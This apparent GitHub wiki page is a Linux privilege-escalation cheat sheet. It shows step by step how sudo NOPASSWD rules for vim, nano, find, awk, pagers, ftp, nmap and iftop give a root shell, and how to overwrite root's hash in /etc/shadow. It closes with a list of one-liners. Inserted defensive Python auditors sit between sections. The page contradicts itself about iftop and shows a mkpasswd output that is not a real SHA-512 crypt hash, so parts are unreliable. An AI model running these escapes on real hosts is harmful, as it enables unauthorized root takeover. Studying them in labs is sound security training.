# info - sudo privesc linux (taylorjohn/hacking GitHub Wiki)

## Linux privesc methods
```bash
root@attack_ip:$ ssh [email protected]
root@attack_ip: password:$ password321
user@debian:$ whoami
user
user@debian:$ id
user@debian:~$ sudo -l
(root) NOPASSWD: /usr/sbin/iftop
(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk
(root) NOPASSWD: /usr/bin/less
(root) NOPASSWD: /usr/bin/ftp
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/apache2
(root) NOPASSWD: /bin/more
```
### /usr/bin/vim and /usr/bin/nano

Both vim and nano can be used to execute commands or edit privileged files.

Vim:

```bash
(root) NOPASSWD: /usr/bin/vim
user@debian:~$ sudo vim -c ':!/bin/sh'
```

Nano: nano can be used to edit any file when run as root. You could modify /etc/passwd or /etc/sudoers to grant more explicit access:

```bash
(root) NOPASSWD: /usr/bin/nano
user@debian:~$ sudo nano /etc/sudoers
```
### /usr/bin/find

The find command can execute commands with the -exec option.

```bash
user@debian:~$ sudo find / -exec /bin/sh \; -quit
sh-4.1# whoami
root
```

This executes a shell with root privileges.
### /usr/bin/awk

Awk can execute system commands, making it possible to spawn a shell.

```bash
root@attack_ip:$ sudo awk 'BEGIN {system("/bin/sh")}'
sh-4.1# whoami
root
```
### /usr/bin/less, /usr/bin/man, /bin/more

These pager utilities can often be exploited to spawn a shell.

```bash
root@attack_ip:$ sudo less /etc/passwd
```

Then, typing `!sh` inside less/man/more will drop you into a shell.

```bash
root@attack_ip:$ !sh
sh-4.1# whoami
root
```
### /usr/bin/ftp

FTP can be used to download and execute scripts, or in some versions, to spawn a TTY shell directly.

```bash
root@attack_ip:$ echo '!/bin/sh' | sudo ftp
```
### /usr/bin/nmap

Nmap contains an interactive mode that allows Lua scripting, which can be exploited to gain a shell. With `(root) NOPASSWD: /usr/bin/nmap`, if the version of Nmap is < 7.70, you can use it to spawn a shell.

```bash
root@attack_ip:$ echo 'os.execute("/bin/sh")' > shell.nse
root@attack_ip:$ sudo nmap --script=shell.nse
Starting Nmap 5.00 ( http://nmap.org ) at 2024-03-22 14:27 EDT
sh-4.1# whoami
root
```
### /usr/bin/apache2

Although not commonly used for direct privilege escalation, if you have the ability to configure Apache or manipulate its configuration files, you could potentially serve malicious content or leverage Apache modules to execute commands.

### /usr/sbin/iftop

Iftop doesn't have a direct known method for spawning a shell or executing commands, but always check for updated exploits or creative uses.
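For an administrator reviewing a host, the `sudo -l` listing above can be turned into a report of which NOPASSWD rules grant a program this page shows escaping to a shell. This is an added example, not code from the wiki; the rule table, the regex and the sample listing are constructed here.

```python
import re
from typing import Dict, List

# Programs this page shows escaping to a root shell, and why each is risky.
SHELL_ESCAPE_BINARIES = {
    "vim": "editor: can run shell commands",
    "nano": "editor: can rewrite /etc/sudoers or /etc/passwd",
    "find": "-exec runs any command",
    "awk": "system() runs any command",
    "less": "pager: can spawn a shell",
    "more": "pager: can spawn a shell",
    "man": "pager: can spawn a shell",
    "ftp": "can spawn a shell",
    "nmap": "NSE scripts can run OS commands",
    "iftop": "can spawn a shell",
}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")  # one rule line, e.g. "(root) NOPASSWD: /usr/bin/find"

# Constructed sample, taken from the listing on this page (including its "/ usr" spacing).
SAMPLE_SUDO_L = """User user may run the following commands on debian:
    (root) NOPASSWD: / usr/sbin/iftop
    (root) NOPASSWD: / usr/bin/find
    (root) NOPASSWD: / usr/bin/apache2
    (root) NOPASSWD: /bin/more
    (ALL : ALL) /usr/bin/systemctl status
"""

def parse_sudo_rules(text: str) -> List[Dict[str, object]]:
    """Return one dict per rule line: run-as user, option tags and command."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header lines such as "User user may run ..." are skipped
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        cmd = m.group("cmd").replace("/ ", "/")  # repair the "/ usr/bin" spacing
        rules.append({"runas": m.group("runas").strip(), "tags": tags, "cmd": cmd})
    return rules

def audit_sudo_rules(text: str) -> List[str]:
    """List every rule whose program is in SHELL_ESCAPE_BINARIES, with the reason."""
    findings = []
    for r in parse_sudo_rules(text):
        prog = str(r["cmd"]).split()[0].rsplit("/", 1)[-1]
        if prog in SHELL_ESCAPE_BINARIES:
            tag = " NOPASSWD" if "NOPASSWD" in r["tags"] else ""
            findings.append(f"({r['runas']}){tag} {r['cmd']}: {SHELL_ESCAPE_BINARIES[prog]}")
    return findings
```

Feed it the real `sudo -l` output of a host and every flagged line is a sudoers entry to restrict or remove.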
- Readable /etc/shadow
- Writable /etc/shadow

Check the permissions, then read the file:

```bash
ls -l /etc/shadow
sudo cat /etc/shadow
```

Each line of /etc/shadow has nine colon-separated fields, for example:

```
mark:$6$.n.:17736:0:99999:7:::
```

1. Username
2. Encrypted password
3. Last password change
4. Minimum password age
5. Maximum password age
6. Warning period
7. Inactivity period
8. Expiration date
9. Unused
```
linuxize:$6$zHvrJMa5Y690smbQ$z5zdL...:18009:0:120:7:14::
```

- The password is encrypted with SHA-512 (the password is truncated for better readability).
- The password was last changed on April 23, 2019 (day 18009).
- There is no minimum password age.
- The password must be changed at least every 120 days.
- The user will receive a warning message seven days before the password expiration date.
- If the user doesn't attempt to login to the system 14 days after the password is expired, the account will be disabled.
- There is no account expiration date.
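The nine-field layout above, as an added parser that is not part of the wiki: it decodes a shadow line, converts the day counts to dates, identifies the hash scheme from its `$id$` prefix and flags empty or legacy hashes, and checks a permission mode against the Debian default of 0640 root:shadow for the readable/writable checks above. The sample entries are constructed and the hash strings are placeholders, not real credentials.

```python
from collections import namedtuple
from datetime import date, timedelta
from typing import List, Optional

EPOCH = date(1970, 1, 1)  # shadow day counts are days since 1970-01-01
HASH_IDS = {"$1$": "MD5", "$2b$": "bcrypt", "$5$": "SHA-256", "$6$": "SHA-512", "$y$": "yescrypt"}
# Fields 1-8 of a shadow line; field 9 is reserved and not kept.
ShadowEntry = namedtuple("ShadowEntry", "user pw_hash last_change min_age max_age warn inactive expire")

def _int(s: str) -> Optional[int]:
    return int(s) if s.strip() else None

def _day(s: str) -> Optional[date]:
    n = _int(s)
    return EPOCH + timedelta(days=n) if n is not None else None

def parse_shadow_line(line: str) -> ShadowEntry:
    """Split one shadow line into its fields; day counts become dates."""
    f = line.rstrip("\n").split(":")
    if len(f) != 9:
        raise ValueError(f"expected 9 fields, got {len(f)}: {line!r}")
    return ShadowEntry(f[0], f[1], _day(f[2]), _int(f[3]), _int(f[4]),
                       _int(f[5]), _int(f[6]), _day(f[7]))

def hash_algorithm(pw_hash: str) -> str:
    """Identify the crypt(3) scheme from the $id$ prefix of the hash field."""
    if pw_hash == "":
        return "empty"  # login with no password at all
    if pw_hash.startswith(("!", "*")):
        return "locked"
    for prefix, name in HASH_IDS.items():
        if pw_hash.startswith(prefix):
            return name
    return "legacy"  # e.g. 13-character DES crypt

def audit_entry(e: ShadowEntry) -> List[str]:
    """Findings for one entry; an empty list means nothing was flagged."""
    issues = []
    alg = hash_algorithm(e.pw_hash)
    if alg in ("empty", "MD5", "legacy"):
        issues.append(f"{e.user}: weak or missing password hash ({alg})")
    if e.max_age is None or e.max_age >= 99999:
        issues.append(f"{e.user}: no maximum password age")
    return issues

def shadow_mode_ok(mode: int) -> bool:
    """True when the mode bits (e.g. 0o640 root:shadow) give 'other' no access and the group no write."""
    return (mode & 0o027) == 0
```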
Generate a new password hash with a password of your choice:

```bash
mkpasswd -m sha-512 newpasswordhere
```

Edit the /etc/shadow file and replace the original root user's password hash with the one you just generated.

```bash
mkpasswd -m sha-512 newpassword
7dd29a9c9643fd524e1b4360964b89ce59914e68d1fd1ab04dd61fbaaabc58e579dcffb5b7454ab01e586c8ae98e538b5d6e0ff3ae7dd442de7333486dc9df1a
```

Switch to the root user, using the new password:

```bash
su root
```
```
sudo -l
sudo iftop ====> then ====> !/bin/bash
```

```bash
user@debian:~$ sudo iftop
(opens iftop)
!/bin/bash
root@debian:/home/user# whoami
root
root@debian:/home/user#
```
```bash
user@debian:~$ sudo find /home -exec /bin/bash \;
root@debian:/home/user# whoami
root
```
```
sudo man man ====> then ====> !/bin/bash
```

```bash
user@debian:~$ sudo man man
!/bin/bash
root@debian:/usr/share/man# whoami
root
```
Summary of the one-liners:

```
sudo nano ====> then ====> ^R^X ====> reset; sh 1>&0 2>&0
sudo vim -c '!sh'
sudo awk 'BEGIN {system("/bin/sh")}'
sudo less /etc/hosts ====> then ====> !/bin/bash
sudo ftp ====> then ====> !/bin/bash
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
TERM= sudo more /etc/profile ====> then ====> !/bin/sh
```